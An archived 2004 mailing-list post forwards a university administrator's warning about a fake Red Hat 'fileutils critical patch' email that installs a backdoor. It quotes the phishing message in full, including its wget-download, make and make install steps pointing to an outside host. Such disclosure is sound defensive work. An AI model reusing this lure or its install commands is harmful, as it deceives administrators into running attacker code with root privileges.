[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
fake Redhat update (fwd)
For those of you not on the lan-admin maillist:
---------- Forwarded message ----------
Date: Mon, 22 Nov 2004 21:15:30 -0800
From: Peter Van Epp <vanepp@sfu.ca>
To: lan-administrators@sfu.ca
Subject: fake Redhat update
This email looks to have been sent to a number of people at SFU.
It is in fact a fake which installs a backdoor (someone got caught which is
how we know) in to your system. So if you have received one of these, please
don't install it ...
Peter Van Epp / Operations and Technical Support
----- Original Message -----=20
From: Fedora Red Hat=20
Sent: Saturday, November 20, 2004 2:09 PM
Subject: Fileutils Critical Patch Update
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: Red Hat=20
A complete revision history is at the end of this file.=20
Dear Red Hat user,
We have found a vulnerability in fileutils (ls and mkdir), that could =
allow a remote attacker to execute arbitrary code with root privileges. =
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, =
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is =
known that *BSD and Solaris platforms are NOT affected.
The Red Hat Security Team strongly advises you to immediately apply the =
fileutils-1.0.6 patch. This is a critical-critical update that you must =
make by following these steps:
a.. First download the patch from the Wcml Red Hat mirror: wget =
http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or directly =
here.=20
b.. Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz=20
c.. cd fileutils-1.0.6.patch=20
d.. make=20
e.. make install=20
Again, please apply this patch as soon as possible or you risk your =
system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
Red Hat Security Team.
Copyright =A9 2004 Red Hat, Inc. All rights reserved.=20